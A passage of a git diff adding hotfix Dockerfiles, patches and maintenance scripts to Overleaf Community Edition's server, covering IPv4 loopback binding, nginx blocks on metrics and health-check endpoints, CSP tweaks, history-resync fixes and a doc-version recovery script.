++  location ~* ^/metrics/?$ {
++    return 404 'Not found';
++  }
++
++  # block external access to all health checks /health_check, /health_check/full, etc
++  location ~* ^/health_check {
++    return 404 'Not found';
++  }
++
+   # Load any extra configuration for this vhost
+   include /etc/nginx/vhost-extras/overleaf/*.conf;
+ }
diff --git a/server-ce/hotfix/4.2.8/pr_19550.patch b/server-ce/hotfix/4.2.8/pr_19550.patch
new file mode 100644
index 0000000..484a3f2
--- /dev/null
+++ b/server-ce/hotfix/4.2.8/pr_19550.patch
@@ -0,0 +1,58 @@
+diff --git a/services/web/app/src/infrastructure/CSP.js b/services/web/app/src/infrastructure/CSP.js
+index 28f4f380d3d..abc11c59a48 100644
+--- a/services/web/app/src/infrastructure/CSP.js
++++ b/services/web/app/src/infrastructure/CSP.js
+@@ -6,6 +6,7 @@ module.exports = function ({
+   reportPercentage,
+   reportOnly = false,
+   exclude = [],
++  viewDirectives = {},
+ }) {
+   const header = reportOnly
+     ? 'Content-Security-Policy-Report-Only'
+@@ -33,7 +34,12 @@
+
+     res.locals.scriptNonce = scriptNonce
+
+-    const policy = buildViewPolicy(scriptNonce, reportPercentage, reportUri)
++    const policy = buildViewPolicy(
++      scriptNonce,
++      reportPercentage,
++      reportUri,
++      viewDirectives[view]
++    )
+
+     // Note: https://csp-evaluator.withgoogle.com/ is useful for checking the policy
+
+@@ -68,11 +74,17 @@ const buildDefaultPolicy = (reportUri, styleSrc) => {
+   return directives.join('; ')
+ }
+
+-const buildViewPolicy = (scriptNonce, reportPercentage, reportUri) => {
++const buildViewPolicy = (
++  scriptNonce,
++  reportPercentage,
++  reportUri,
++  viewDirectives
++) => {
+   const directives = [
+     `script-src 'nonce-${scriptNonce}' 'unsafe-inline' 'strict-dynamic' https: 'report-sample'`, // only allow scripts from certain sources
+     `object-src 'none'`, // forbid loading an "object" element
+     `base-uri 'none'`, // forbid setting a "base" element
++    ...(viewDirectives ?? []),
+   ]
+
+   if (reportUri) {
+--- a/services/web/config/settings.defaults.js
++++ b/services/web/config/settings.defaults.js
+@@ -868,6 +868,9 @@ module.exports = {
+     reportPercentage: parseFloat(process.env.CSP_REPORT_PERCENTAGE) || 0,
+     reportUri: process.env.CSP_REPORT_URI,
+     exclude: ['app/views/project/editor'],
++    viewDirectives: {
++      'app/views/project/ide-react': [`img-src 'self' data: blob:`],
++    },
+   },
+
+   unsupportedBrowsers: {
+
diff --git a/server-ce/hotfix/4.2.8/pr_19612.patch b/server-ce/hotfix/4.2.8/pr_19612.patch
new file mode 100644
index 0000000..3f46f92
--- /dev/null
+++ b/server-ce/hotfix/4.2.8/pr_19612.patch
@@ -0,0 +1,46 @@
+diff --git a/services/web/app/src/Features/HealthCheck/HealthCheckController.js b/services/web/app/src/Features/HealthCheck/HealthCheckController.js
+index 278f04bb767..ff074cfa816 100644
+--- a/services/web/app/src/Features/HealthCheck/HealthCheckController.js
++++ b/services/web/app/src/Features/HealthCheck/HealthCheckController.js
+@@ -45,6 +45,10 @@ module.exports = {
+       logger.err({ err }, 'failed api redis health check')
+       return res.sendStatus(500)
+     }
++    if (!settings.smokeTest.userId) {
++      logger.err({}, 'smokeTest.userId is undefined in health check')
++      return res.sendStatus(404)
++    }
+     UserGetter.getUserEmail(settings.smokeTest.userId, (err, email) => {
+       if (err) {
+         logger.err({ err }, 'failed api mongo health check')
+diff --git a/services/web/app/src/infrastructure/ExpressLocals.js b/services/web/app/src/infrastructure/ExpressLocals.js
+index 5f14977d3a3..2e9ed4f1ebb 100644
+--- a/services/web/app/src/infrastructure/ExpressLocals.js
++++ b/services/web/app/src/infrastructure/ExpressLocals.js
+@@ -11,6 +11,7 @@ const Features = require('./Features')
+ const SessionManager = require('../Features/Authentication/SessionManager')
+ const PackageVersions = require('./PackageVersions')
+ const Modules = require('./Modules')
++const Errors = require('../Features/Errors/Errors')
+ const {
+   canRedirectToAdminDomain,
+   hasAdminAccess,
+@@ -236,10 +237,14 @@ module.exports = function (webRouter, privateApiRouter, publicApiRouter) {
+
+     // Don't include the query string parameters, otherwise Google
+     // treats ?nocdn=true as the canonical version
+-    const parsedOriginalUrl = new URL(req.originalUrl, Settings.siteUrl)
+-    res.locals.currentUrl = parsedOriginalUrl.pathname
+-    res.locals.currentUrlWithQueryParams =
+-      parsedOriginalUrl.pathname + parsedOriginalUrl.search
++    try {
++      const parsedOriginalUrl = new URL(req.originalUrl, Settings.siteUrl)
++      res.locals.currentUrl = parsedOriginalUrl.pathname
++      res.locals.currentUrlWithQueryParams =
++        parsedOriginalUrl.pathname + parsedOriginalUrl.search
++    } catch (err) {
++      return next(new Errors.InvalidError())
++    }
+     res.locals.capitalize = function (string) {
+       if (string.length === 0) {
+         return ''
diff --git a/server-ce/hotfix/4.2.9/Dockerfile b/server-ce/hotfix/4.2.9/Dockerfile
new file mode 100644
index 0000000..43ca479
--- /dev/null
+++ b/server-ce/hotfix/4.2.9/Dockerfile
@@ -0,0 +1 @@
+FROM sharelatex/sharelatex:4.2.8
diff --git a/server-ce/hotfix/5.0.1/Dockerfile b/server-ce/hotfix/5.0.1/Dockerfile
new file mode 100644
index 0000000..32ba317
--- /dev/null
+++ b/server-ce/hotfix/5.0.1/Dockerfile
@@ -0,0 +1,17 @@
+FROM sharelatex/sharelatex:5.0.0-RC4
+
+# Bugfix: Grammarly ad shouldn't be displayed in Overleaf CE
+COPY pr_17625.patch .
+RUN patch -p0 < pr_17625.patch + +# Patch: force services to use ipv4 in server-ce container +ADD env.sh /etc/overleaf/env.sh +COPY pr_17601-1.patch /etc/overleaf/ +RUN cd /etc/overleaf && patch -p0 < pr_17601-1.patch && rm pr_17601-1.patch +COPY pr_17601-2.patch /overleaf/cron/ +RUN cd /overleaf/cron && patch -p0 < pr_17601-2.patch && rm pr_17601-2.patch +COPY pr_17601-3.patch /etc/nginx/sites-enabled/ +RUN cd /etc/nginx/sites-enabled && patch -p0 < pr_17601-3.patch && rm pr_17601-3.patch +COPY pr_17601-4.patch /etc/service/ +RUN cd /etc/service && patch -p0 < pr_17601-4.patch && rm pr_17601-4.patch + diff --git a/server-ce/hotfix/5.0.1/env.sh b/server-ce/hotfix/5.0.1/env.sh new file mode 100644 index 0000000..2dee36a --- /dev/null +++ b/server-ce/hotfix/5.0.1/env.sh @@ -0,0 +1,14 @@ +export CHAT_HOST=127.0.0.1 +export CLSI_HOST=127.0.0.1 +export CONTACTS_HOST=127.0.0.1 +export DOCSTORE_HOST=127.0.0.1 +export DOCUMENT_UPDATER_HOST=127.0.0.1 +export DOCUPDATER_HOST=127.0.0.1 +export FILESTORE_HOST=127.0.0.1 +export HISTORY_V1_HOST=127.0.0.1 +export NOTIFICATIONS_HOST=127.0.0.1 +export PROJECT_HISTORY_HOST=127.0.0.1 +export REALTIME_HOST=127.0.0.1 +export SPELLING_HOST=127.0.0.1 +export WEB_HOST=127.0.0.1 +export WEB_API_HOST=127.0.0.1 diff --git a/server-ce/hotfix/5.0.1/pr_17601-1.patch b/server-ce/hotfix/5.0.1/pr_17601-1.patch new file mode 100644 index 0000000..3f8c136 --- /dev/null +++ b/server-ce/hotfix/5.0.1/pr_17601-1.patch @@ -0,0 +1,31 @@ +--- settings.js ++++ settings.js +@@ -256,16 +256,16 @@ const settings = { + + apis: { + web: { +- url: 'http://localhost:3000', ++ url: 'http://127.0.0.1:3000', + user: httpAuthUser, + pass: httpAuthPass, + }, + project_history: { + sendProjectStructureOps: true, +- url: 'http://localhost:3054', ++ url: 'http://127.0.0.1:3054', + }, + v1_history: { +- url: process.env.V1_HISTORY_URL || 'http://localhost:3100/api', ++ url: process.env.V1_HISTORY_URL || 'http://127.0.0.1:3100/api', + user: 'staging', + pass: process.env.STAGING_PASSWORD, + requestTimeout: parseInt( +@@ -409,7 +409,7 @@ if ( + + if (parse(process.env.OVERLEAF_IS_SERVER_PRO) === true) { + settings.bypassPercentageRollouts = true +- settings.apis.references = { url: 'http://localhost:3040' } ++ settings.apis.references = { url: 'http://127.0.0.1:3040' } + } + + // Compiler diff --git a/server-ce/hotfix/5.0.1/pr_17601-2.patch b/server-ce/hotfix/5.0.1/pr_17601-2.patch new file mode 100644 index 0000000..2322ad9 --- /dev/null +++ b/server-ce/hotfix/5.0.1/pr_17601-2.patch @@ -0,0 +1,63 @@ +--- deactivate-projects.sh ++++ deactivate-projects.sh +@@ -14,7 +14,7 @@ if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + exit 0 + fi + +-WEB_URL='http://localhost:3000' ++WEB_URL='http://127.0.0.1:3000' + + USER=$(cat /etc/container_environment/WEB_API_USER) + PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) +--- delete-projects.sh ++++ delete-projects.sh +@@ -14,7 +14,7 @@ if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + exit 0 + fi + +-WEB_URL='http://localhost:3000' ++WEB_URL='http://127.0.0.1:3000' + + USER=$(cat /etc/container_environment/WEB_API_USER) + PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) +--- delete-users.sh ++++ delete-users.sh +@@ -14,7 +14,7 @@ if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + exit 0 + fi + +-WEB_URL='http://localhost:3000' ++WEB_URL='http://127.0.0.1:3000' + + USER=$(cat /etc/container_environment/WEB_API_USER) + PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) +--- 
project-history-periodic-flush.sh ++++ project-history-periodic-flush.sh +@@ -7,6 +7,6 @@ echo "Flush project-history queue" + echo "--------------------------" + date + +-PROJECT_HISTORY_URL='http://localhost:3054' ++PROJECT_HISTORY_URL='http://127.0.0.1:3054' + + curl -X POST "${PROJECT_HISTORY_URL}/flush/old?timeout=3600000&limit=5000&background=1" +--- project-history-retry-hard.sh ++++ project-history-retry-hard.sh +@@ -7,6 +7,6 @@ echo "Retry project-history errors (hard)" + echo "-----------------------------------" + date + +-PROJECT_HISTORY_URL='http://localhost:3054' ++PROJECT_HISTORY_URL='http://127.0.0.1:3054' + + curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=hard&timeout=3600000&limit=10000" +--- project-history-retry-soft.sh ++++ project-history-retry-soft.sh +@@ -6,6 +6,6 @@ echo "-----------------------------------" + echo "Retry project-history errors (soft)" + echo "-----------------------------------" + +-PROJECT_HISTORY_URL='http://localhost:3054' ++PROJECT_HISTORY_URL='http://127.0.0.1:3054' + + curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=soft&timeout=3600000&limit=10000" diff --git a/server-ce/hotfix/5.0.1/pr_17601-3.patch b/server-ce/hotfix/5.0.1/pr_17601-3.patch new file mode 100644 index 0000000..fa138d6 --- /dev/null +++ b/server-ce/hotfix/5.0.1/pr_17601-3.patch @@ -0,0 +1,46 @@ +--- overleaf.conf ++++ overleaf.conf +@@ -10,7 +10,7 @@ server { + } + + location / { +- proxy_pass http://localhost:4000; ++ proxy_pass http://127.0.0.1:4000; + proxy_http_version 1.1; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection "upgrade"; +@@ -22,7 +22,7 @@ server { + } + + location /socket.io { +- proxy_pass http://localhost:3026; ++ proxy_pass http://127.0.0.1:3026; + proxy_http_version 1.1; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection "upgrade"; +@@ -48,22 +48,22 @@ server { + + # handle output files for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z]+)$ { +- proxy_pass http://localhost:8080; # clsi-nginx.conf ++ proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } + # handle output files for anonymous users + location ~ ^/project/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z]+)$ { +- proxy_pass http://localhost:8080; # clsi-nginx.conf ++ proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } + # PDF range for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { +- proxy_pass http://localhost:8080; # clsi-nginx.conf ++ proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } + # PDF range for anonymous users + location ~ ^/project/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { +- proxy_pass http://localhost:8080; # clsi-nginx.conf ++ proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } diff --git a/server-ce/hotfix/5.0.1/pr_17601-4.patch b/server-ce/hotfix/5.0.1/pr_17601-4.patch new file mode 100644 index 0000000..9b1fed6 --- /dev/null +++ b/server-ce/hotfix/5.0.1/pr_17601-4.patch @@ -0,0 +1,118 @@ +--- chat-overleaf/run ++++ chat-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30100" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/chat/app.js >> /var/log/overleaf/chat.log 2>&1 +--- clsi-overleaf/run ++++ clsi-overleaf/run 
+@@ -15,4 +15,7 @@ if [ -e '/var/run/docker.sock' ]; then + usermod -aG dockeronhost www-data + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/clsi/app.js >> /var/log/overleaf/clsi.log 2>&1 +--- contacts-overleaf/run ++++ contacts-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30360" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/contacts/app.js >> /var/log/overleaf/contacts.log 2>&1 +--- docstore-overleaf/run ++++ docstore-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30160" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/docstore/app.js >> /var/log/overleaf/docstore.log 2>&1 +--- document-updater-overleaf/run ++++ document-updater-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30030" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/document-updater/app.js >> /var/log/overleaf/document-updater.log 2>&1 +--- filestore-overleaf/run ++++ filestore-overleaf/run +@@ -1,2 +1,6 @@ + #!/bin/bash ++ ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node /overleaf/services/filestore/app.js >> /var/log/overleaf/filestore.log 2>&1 +--- notifications-overleaf/run ++++ notifications-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30420" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/notifications/app.js >> /var/log/overleaf/notifications.log 2>&1 +--- project-history-overleaf/run ++++ project-history-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30540" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/project-history/app.js >> /var/log/overleaf/project-history.log 2>&1 +--- real-time-overleaf/run ++++ real-time-overleaf/run +@@ -1,2 +1,6 @@ + #!/bin/bash ++ ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node /overleaf/services/real-time/app.js >> /var/log/overleaf/real-time.log 2>&1 +--- spelling-overleaf/run ++++ spelling-overleaf/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30050" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/spelling/app.js >> /var/log/overleaf/spelling.log 2>&1 +--- web-api-overleaf/run ++++ web-api-overleaf/run +@@ -6,6 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30000" + fi + ++source /etc/overleaf/env.sh + export LISTEN_ADDRESS=0.0.0.0 + export ENABLED_SERVICES="api" + export METRICS_APP_NAME="web-api" +--- web-overleaf/run ++++ web-overleaf/run +@@ -6,6 +6,8 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:40000" + fi + ++source /etc/overleaf/env.sh ++export LISTEN_ADDRESS=127.0.0.1 + export 
ENABLED_SERVICES="web" + export WEB_PORT="4000" diff --git a/server-ce/hotfix/5.0.1/pr_17625.patch b/server-ce/hotfix/5.0.1/pr_17625.patch new file mode 100644 index 0000000..0241c11 --- /dev/null +++ b/server-ce/hotfix/5.0.1/pr_17625.patch @@ -0,0 +1,23 @@ +--- services/web/frontend/js/features/source-editor/components/grammarly-advert.tsx ++++ services/web/frontend/js/features/source-editor/components/grammarly-advert.tsx +@@ -6,8 +6,12 @@ import useRemindMeLater from '@/shared/hooks/use-remind-me-later' + import GrammarlyLogo from '@/shared/svgs/grammarly-logo' + import * as eventTracking from '../../../infrastructure/event-tracking' + import useWaitForGrammarlyCheck from '@/shared/hooks/use-wait-for-grammarly-check' ++import getMeta from '@/utils/meta' ++import { ExposedSettings } from '../../../../../types/exposed-settings' + + export default function GrammarlyAdvert() { ++ const { isOverleaf } = getMeta('ol-ExposedSettings') as ExposedSettings ++ + const [show, setShow] = useState(false) + const { t } = useTranslation() + +@@ -57,7 +61,7 @@ export default function GrammarlyAdvert() { + remindThemLater() + }, [remindThemLater]) + +- if (!show) { ++ if (!isOverleaf || !show) { + return null + } diff --git a/server-ce/hotfix/5.0.2/910_initiate_doc_version_recovery b/server-ce/hotfix/5.0.2/910_initiate_doc_version_recovery new file mode 100755 index 0000000..cda3d67 --- /dev/null +++ b/server-ce/hotfix/5.0.2/910_initiate_doc_version_recovery @@ -0,0 +1,50 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +source /etc/overleaf/env.sh + +LOG_FILE=/var/lib/overleaf/data/history/doc-version-recovery.log +export DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE=/var/lib/overleaf/data/history/doc-version-recovery-resyncs.log + +echo "Checking for doc version recovery. This can take a while if needed. Logs are in $LOG_FILE" +cd /overleaf/services/history-v1 +LOG_LEVEL=info node storage/scripts/recover_doc_versions.js 2>&1 | tee -a "$LOG_FILE" + +function resyncAllProjectsInBackground() { + waitForService docstore 3016 + waitForService document-updater 3003 + waitForService filestore 3009 + waitForService history-v1 3100 + waitForService project-history 3054 + waitForService web-api 4000 + + # Resync files that had their versions updated + while read -r project_id; do + echo "Resyncing project $project_id..." + curl -X POST --silent "http://127.0.0.1:3054/project/$project_id/resync?force=true" + done < "$DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE" + + # Resync files that have broken histories + /overleaf/bin/force-history-resyncs + + echo "Finished resyncing history for all projects. Adding .done suffix to log file" + mv "$DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE" "$DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE.done" +} + +function waitForService() { + local name=$1 + local port=$2 + while ! curl --fail --silent "http://127.0.0.1:$port/status"; do + echo "Waiting for $name service to start up" + sleep 10 + done +} + +if [ -f "$DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE" ]; then + echo "Finished recovery of doc versions. Resyncing history for all projects in the background." + resyncAllProjectsInBackground & +else + echo "No recovery of doc versions needed." 
+fi diff --git a/server-ce/hotfix/5.0.2/Dockerfile b/server-ce/hotfix/5.0.2/Dockerfile new file mode 100644 index 0000000..e5bad9f --- /dev/null +++ b/server-ce/hotfix/5.0.2/Dockerfile @@ -0,0 +1,35 @@ +FROM sharelatex/sharelatex:5.0.1 + +# Upgrade Node.js to version 18.20.2 +RUN apt-get update \ +&& apt-get install -y nodejs=18.20.2-1nodesource1 \ +&& rm -rf /var/lib/apt/lists/* + +# Patch: https://github.com/overleaf/internal/pull/17843 +COPY pr_17843.patch . +RUN patch -p0 < pr_17843.patch \ +&& rm pr_17843.patch + +# Add history utility scripts +ADD bin/* /overleaf/bin/ + +# Patch: https://github.com/overleaf/internal/pull/17885 +COPY pr_17885.patch . +RUN patch -p0 -d /etc/my_init.pre_shutdown.d < pr_17885.patch \ +&& rm pr_17885.patch + +# Recompile frontend for Grammarly patch in 5.0.1 +RUN node genScript compile | bash + +# Patch: https://github.com/overleaf/internal/pull/17960 +COPY pr_17960.patch . +RUN patch -p0 < pr_17960.patch \ +&& rm pr_17960.patch + +# Fix bad ordering of migrations +RUN mv /overleaf/services/web/migrations/20231219081700_move_doc_versions_from_docops_to_docs.js \ + /overleaf/services/web/migrations/20231105000000_move_doc_versions_from_docops_to_docs.js + +# Add doc versions recovery scripts +ADD 910_initiate_doc_version_recovery /etc/my_init.d/910_initiate_doc_version_recovery +ADD recover_doc_versions.js /overleaf/services/history-v1/storage/scripts/recover_doc_versions.js diff --git a/server-ce/hotfix/5.0.2/bin/flush-history-queues b/server-ce/hotfix/5.0.2/bin/flush-history-queues new file mode 100755 index 0000000..b54bc55 --- /dev/null +++ b/server-ce/hotfix/5.0.2/bin/flush-history-queues @@ -0,0 +1,8 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +source /etc/overleaf/env.sh +cd /overleaf/services/project-history +node scripts/flush_all.js 100000 diff --git a/server-ce/hotfix/5.0.2/bin/force-history-resyncs b/server-ce/hotfix/5.0.2/bin/force-history-resyncs new file mode 100755 index 0000000..389c98a --- /dev/null +++ b/server-ce/hotfix/5.0.2/bin/force-history-resyncs @@ -0,0 +1,8 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +source /etc/overleaf/env.sh +cd /overleaf/services/project-history +node scripts/force_resync.js 1000 force diff --git a/server-ce/hotfix/5.0.2/pr_17843.patch b/server-ce/hotfix/5.0.2/pr_17843.patch new file mode 100644 index 0000000..6865b9b --- /dev/null +++ b/server-ce/hotfix/5.0.2/pr_17843.patch @@ -0,0 +1,48 @@ +--- services/project-history/app/js/ErrorRecorder.js ++++ services/project-history/app/js/ErrorRecorder.js +@@ -210,6 +210,14 @@ export function getFailures(callback) { + 'Error: bad response from filestore: 404': 'filestore-404', + 'Error: bad response from filestore: 500': 'filestore-500', + 'NotFoundError: got a 404 from web api': 'web-api-404', ++ 'OError: history store a non-success status code: 413': ++ 'history-store-413', ++ 'OError: history store a non-success status code: 422': ++ 'history-store-422', ++ 'OError: history store a non-success status code: 500': ++ 'history-store-500', ++ 'OError: history store a non-success status code: 503': ++ 'history-store-503', + 'Error: history store a non-success status code: 413': + 'history-store-413', + 'Error: history store a non-success status code: 422': +--- services/project-history/app/js/RetryManager.js ++++ services/project-history/app/js/RetryManager.js +@@ -20,6 +20,7 @@ const TEMPORARY_FAILURES = [ + + const HARD_FAILURES = [ + 'Error: history store a non-success status code: 422', ++ 'OError: 
history store a non-success status code: 422', + 'OpsOutOfOrderError: project structure version out of order', + 'OpsOutOfOrderError: project structure version out of order on incoming updates', + 'OpsOutOfOrderError: doc version out of order', +--- services/project-history/scripts/clear_deleted_history.js ++++ services/project-history/scripts/clear_deleted_history.js +@@ -143,7 +143,7 @@ function checkAndClear(project, callback) { + // find all the broken projects from the failure records + async function main() { + const results = await db.projectHistoryFailures +- .find({ error: 'Error: history store a non-success status code: 422' }) ++ .find({ error: /history store a non-success status code: 422/ }) + .toArray() + + console.log('number of queues without history store 442 =', results.length) +--- services/project-history/scripts/force_resync.js ++++ services/project-history/scripts/force_resync.js +@@ -198,6 +198,7 @@ function checkAndClear(project, callback) { + // find all the broken projects from the failure records + const errorsToResync = [ + 'Error: history store a non-success status code: 422', ++ 'OError: history store a non-success status code: 422', + 'OpsOutOfOrderError: project structure version out of order', + ] + diff --git a/server-ce/hotfix/5.0.2/pr_17885.patch b/server-ce/hotfix/5.0.2/pr_17885.patch new file mode 100644 index 0000000..0e7d326 --- /dev/null +++ b/server-ce/hotfix/5.0.2/pr_17885.patch @@ -0,0 +1,33 @@ +--- 00_close_site ++++ 00_close_site +@@ -1,5 +1,8 @@ + #!/bin/sh + ++. /etc/container_environment.sh ++. /etc/overleaf/env.sh ++ + SITE_MAINTENANCE_FILE_BAK="$SITE_MAINTENANCE_FILE.bak.shutdown" + + mv "${SITE_MAINTENANCE_FILE}" "${SITE_MAINTENANCE_FILE_BAK}" +--- 01_flush_document_updater ++++ 01_flush_document_updater +@@ -1,5 +1,8 @@ + #!/bin/sh + ++. /etc/container_environment.sh ++. /etc/overleaf/env.sh ++ + cd /overleaf/services/document-updater && node scripts/flush_all.js >> /var/log/overleaf/document-updater.log 2>&1 + + EXIT_CODE="$?" +--- 02_flush_project_history ++++ 02_flush_project_history +@@ -1,5 +1,8 @@ + #!/bin/sh + ++. /etc/container_environment.sh ++. /etc/overleaf/env.sh ++ + cd /overleaf/services/project-history && node scripts/flush_all.js >> /var/log/overleaf/project-history.log 2>&1 + + EXIT_CODE="$?" diff --git a/server-ce/hotfix/5.0.2/pr_17960.patch b/server-ce/hotfix/5.0.2/pr_17960.patch new file mode 100644 index 0000000..9a04321 --- /dev/null +++ b/server-ce/hotfix/5.0.2/pr_17960.patch @@ -0,0 +1,32 @@ +diff --git a/services/project-history/scripts/force_resync.js b/services/project-history/scripts/force_resync.js +index 5e77b35826..13e7d3cd5c 100755 +--- services/project-history/scripts/force_resync.js ++++ services/project-history/scripts/force_resync.js +@@ -77,7 +77,7 @@ function checkAndClear(project, callback) { + function startResync(cb) { + if (force) { + console.log('2. 
starting resync for', projectId) +- SyncManager.startResync(projectId, err => { ++ SyncManager.startHardResync(projectId, err => { + if (err) { + console.log('ERR', JSON.stringify(err.message)) + return cb(err) +@@ -195,17 +195,8 @@ function checkAndClear(project, callback) { + ) + } + +-// find all the broken projects from the failure records +-const errorsToResync = [ +- 'Error: history store a non-success status code: 422', +- 'OError: history store a non-success status code: 422', +- 'OpsOutOfOrderError: project structure version out of order', +-] +- + async function main() { +- const results = await db.projectHistoryFailures +- .find({ error: { $in: errorsToResync } }) +- .toArray() ++ const results = await db.projectHistoryFailures.find().toArray() + + console.log('number of queues without history store 442 =', results.length) + // now check if the project is truly deleted in mongo diff --git a/server-ce/hotfix/5.0.2/recover_doc_versions.js b/server-ce/hotfix/5.0.2/recover_doc_versions.js new file mode 100644 index 0000000..32e1dde --- /dev/null +++ b/server-ce/hotfix/5.0.2/recover_doc_versions.js @@ -0,0 +1,243 @@ +const fsPromises = require('fs/promises') +const { ObjectId } = require('mongodb') +const BPromise = require('bluebird') +const logger = require('@overleaf/logger') +const mongodb = require('../lib/mongodb') +const { chunkStore } = require('..') +const Events = require('events') + +// Silence warning. +Events.setMaxListeners(20) + +const BATCH_SIZE = 1000 +const OPTIONS = { + concurrency: parseInt(process.env.DOC_VERSION_RECOVERY_CONCURRENCY, 10) || 20, + force: process.env.DOC_VERSION_RECOVERY_FORCE === 'true', + 'skip-history-failures': + process.env.DOC_VERSION_RECOVERY_SKIP_HISTORY_FAILURES === 'true', + 'resyncs-needed-file': process.env.DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE, +} + +const db = { + deletedProjects: mongodb.db.collection('deletedProjects'), + docs: mongodb.db.collection('docs'), + migrations: mongodb.db.collection('migrations'), + projects: mongodb.db.collection('projects'), +} + +const BAD_MIGRATION_NAME = + '20231219081700_move_doc_versions_from_docops_to_docs' + +let loggingChain = Promise.resolve() +const projectIdsThatNeedResyncing = [] + +async function flushLogQueue() { + const logPath = OPTIONS['resyncs-needed-file'] + loggingChain = loggingChain.then(async () => { + const batch = projectIdsThatNeedResyncing.splice(0) + if (batch.length === 0) return + try { + await fsPromises.appendFile(logPath, batch.join('\n') + '\n') + } catch (err) { + projectIdsThatNeedResyncing.push(...batch) + logger.err({ err, logPath, batch }, 'Failed to write to log file') + } + }) + await loggingChain +} +async function recordProjectNeedsResync(projectId) { + if (OPTIONS['resyncs-needed-file']) { + projectIdsThatNeedResyncing.push(projectId) + await flushLogQueue() + } else { + console.log(`Project ${projectId} needs a hard resync.`) + } +} + +async function main() { + const badMigration = await db.migrations.findOne({ name: BAD_MIGRATION_NAME }) + if (OPTIONS.force || badMigration != null) { + console.warn('Need to recover doc versions. 
